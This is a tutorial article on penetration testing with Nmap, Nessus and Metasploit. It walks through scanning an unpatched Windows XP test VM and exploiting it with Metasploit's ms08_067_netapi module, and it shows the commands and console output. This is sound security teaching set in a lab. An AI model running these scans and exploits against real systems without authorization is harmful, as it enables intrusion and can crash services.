A Penetration Tester's Toolkit

Ever wonder exactly how vulnerable your network is? Using these tools can give you an idea and provide the means to protect yourself.

I don't know about you, but during the years of my IT career, I've become more and more concerned with security. I'm sure everyone has to a certain degree, but for me, it has become a daily part of my job (not that I'm complaining; on the contrary, it's quite exciting). As such, there are a multitude of tools I've used to get said job done. Some I like, and some I don't. But, I keep coming back to three in particular: Nmap, Nessus and Metasploit.

In this article, I introduce these three tools at a high level to give you an idea of how to use them and what to use them for. I also provide some examples from my own experiences to better explain how I use these tools (and how you could possibly use them) in the real world.

Nmap is my go-to tool when beginning my investigations on systems. Nmap has enjoyed quite a long life, starting back in 1997. It's a scanning tool that allows you to perform various tasks, such as remote scanning, fingerprinting, monitoring, inventory and other such functions. It utilizes various techniques like packet manipulation to get the answers to questions like the types of operating systems in use or the version of Web serving software that's running on a target. It's great information if you are to protect your network successfully.

The next tool in my bag is Metasploit. Metasploit has come a long way since its creation in early 2003. Metasploit is a framework for developing and testing vulnerabilities (these are its core functions; its features seem almost limitless at times). It's a great tool for testing server security (just be sure to use test servers, because you never know when code could crash a box).

Finally, the last (but certainly not least) tool in my bag is Nessus. Nessus is a scanner similar to Nmap and has been around almost as long (since 1998). However, Nessus is capable of running vulnerability code against a machine like Metasploit (whereas Metasploit can be used both to develop and run exploitation code), but at a much simpler level. In fact, that's Nessus' strong point; it's easy to use, like Nmap, and it has some of the strengths of Metasploit. Depending on the situation, I may use one or all of these tools, which brings me to a good point—duplication.

Redundant features aren't bad. For example, each one of these tools are capable of doing basic scans. However, you will find that Nmap runs the fastest and offers the least intrusive scanning method. These are the things to consider when taking into account each of these tool's features and how to best use them.

Regardless of the duplicating features in these tools, take the time to learn each tool's individual features to find what works best for you. You might discover that although Nmap is fast, you like the idea of scanning and exploiting with Nessus (all in one step, if you will). You might like the simplicity of Nessus but need the strength of Metasploit (for scripting and grouping tests together). Even though they all get the job done, it depends on your situation as to how you use these tools.

The first thing to do is install these tools. Because this article is in Linux Journal, I assume you're running this on a Linux platform, but all of these tools work on Windows as well. You could install these tools from your repositories, but I recommend going to each tool's Web site and installing from its packages (this ensures that you get the latest version with all current fixes and gives you the best success for installation).

Installation is pretty straightforward; just follow the steps from each tool's respective site, and you'll be fine. As soon as the tools are installed, it's time to start playing with them. I highly recommend that you have either a virtual machine or a test machine of some sort as your first target, so as not to crash anything critical. Nothing's worse than running a scan against a box, only to find out that you crashed it by accident (very high possibility with Nessus and Metasploit, depending on what you are doing) and interrupted someone's work.

For the purpose of this article, I'm going to set up an example scenario. I am going to use a virtual machine with Windows XP (SP3) loaded on it to run these three tools against. This machine will be a fresh install with no patches and the firewall disabled. The reason for this, quite simply, is to be realistic when running these scans. More often than not, I have come across this very machine, sitting in a corner, collecting dust and running some sort of old-mission-critical app (I'm sure you've encountered something similar). Especially in large environments, these machines are very easy to forget about and can give you the biggest amount of trouble. I have configured the host machine to use an IP of 192.168.56.1, and the guest machine to use an IP of 192.168.56.101.

Figure 1. Windows XP Machine

Figure 2. Scanning Machine

Let's start with Nmap to begin the information-gathering stage (you have to know what you're working with) on your target. Because you know the IP of the machine in question, you don't have to but just as easily could run a scan against a subnet or some other subset of IP addresses. For this article, let's stick with 192.168.56.101. In your terminal, run the following (remember that you can run this command as a regular user on the machine, as long as said user has access to /usr/bin/):


nmap  -sV -A -v 192.168.56.101 > /tmp/nmap-output 

I always send the output to a file, as it's easier to read through afterward. Before delving into the output, however, let's look at those switches:

  • -sV — this tells Nmap the type of scan. In this case, it's a version scan to see what programs are running on what ports (where available).

  • -A — this tells Nmap to run a fingerprint check. This means Nmap will attempt to identify the version of the OS and any related information correctly.

  • -v — verbosity—this is important, as you need this to get critical information from Nmap.

Note:

When it comes to tools like Nmap, man pages are your friend. Remember that these tools are extremely complex and have a lot of functions, and that means a lot of switches. When in doubt, always refer to the man pages, lest you use the wrong switch and accidentally crash a box (easily done with tools like Nessus).

Listing 1 shows the output of the previous command.

Listing 1. Nmap Output

Starting Nmap 5.50 ( http://nmap.org ) at 2011-11-07 15:45 EST
NSE: Loaded 57 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating ARP Ping Scan at 15:45
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 15:45, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.02s elapsed
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.56.101 [1000 ports]
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Discovered open port 135/tcp on 192.168.56.101
Completed SYN Stealth Scan at 15:46, 1.15s elapsed (1000 total ports)
Initiating Service scan at 15:46
Scanning 3 services on 192.168.56.101
Completed Service scan at 15:46, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.15s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5B:91:AC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=245 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Host script results:
| nbstat: 
|   NetBIOS name: XPTESTVM, NetBIOS user: <unknown>, 
|   NetBIOS MAC: 08:00:27:5b:91:ac (Cadmus Computer Systems)
|   Names
|     XPTESTVM<00>         Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     XPTESTVM<20>         Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\XPTESTVM
|_  System time: 2011-11-07 15:46:06 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.56.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
NSE: Starting runlevel 2 (of 2) scan.
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect 
results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
           Raw packets sent: 1072 (47.866KB) | Rcvd: 1017 (41.234KB)

As you can see from the output in Listing 1, you can identify that this is indeed a Windows platform, most likely XP, with service pack 2 or 3 or 2003 server. This type of scan is a fingerprinting scan, which allows you to identify the OS and any services worth testing as closely as possible. The fact that you can pull this much information from a very basic scan alone indicates a low level of protection and a high level of threat. You easily can surmise that there is no local firewall, and that this box hasn't gone through any hardening process.

Although you could run many other types of scans against this box to get more information, you have enough here to continue. You could narrow down whether this is a server through a process of elimination. For example, if this is a desktop, the chances of it running a service like MS SQL or Exchange are very minimal. That said, you have enough here to proceed to the second tool, Nessus.

With Nessus, let's put this box to the test to see just what hackers could do to this box if they got access. Nessus now uses a Web interface, but you still can use the command line if you prefer (remember to read the man pages). For this article though, let's stick with the Web interface. Once you log in to the Web GUI (note: it's a slick interface), click on the scan link to begin configuring a scan.

Figure 3. Nessus Landing Page

Figure 4. Nessus Scan Page

Once you click add, configure your scan using these basic settings (Figure 5). This will give you a quick scan with minimal impact, which is key on an internal network. You don't want to disrupt network traffic and bring on the wrath of your fellow admins and network engineers.

Figure 5. Nessus Scan Configuration Page

Once it's complete, click on Reports and double-click your report to open it.

Figure 6. Nessus Report on Test Box

Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let's look at the RPC issue. Open that up and take a look at the listing (Figure 7).

Figure 7. A Lot Going on Here for a Fresh Build

What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).

Figure 8. Detailed Results

This gives us plenty to work with, but let's make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let's bring in the final tool, the heavy-hitter Metasploit.

Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That's not to say Nessus doesn't get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to support your findings. It never hurts to have an extra set of eyes.

Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you're not careful).

Start by opening a terminal, su to root (if you have given a regular user access to the proper files/directories for Metasploit, it's best to run as said user instead of root), and run the command msfconsole (Figure 9).

Figure 9. Behold, Metasploit

Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:


show exploits

Okay, for the purpose of this example, let's use the following command (Figure 10 shows the results), which corresponds to the previous error shown from Nessus (Figure 8):


use exploit/windows/smb/ms08_067_netapi

Figure 10. Exploits Listed and Exploit Selected

You could use another exploit, which simply would crash the box, but let's try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:


show payloads

Next, select the payload by using the following command:


set payload windows/speak_pwned 

Figure 11. Payload Selected

Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.

Listing 2. Output of Exploit

msf  exploit(ms08_067_netapi) > set payload windows/speak_pwned 
payload => windows/speak_pwned
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       Pipe name to use (BROWSER, SRVSVC)


Payload options (windows/speak_pwned):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) > 

As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of "pwnd". If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).

Figure 12. We broke the box.

You could try a few other exploits (actually quite a few), but this gives you a good idea of how something simple like sending an audible could cause an issue. Again, be careful, and always play on a test box.

Conclusion

As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!

Resources

Nmap: http://nmap.org

Metasploit: http://metasploit.com

Nessus: http://www.nessus.org

Load Disqus comments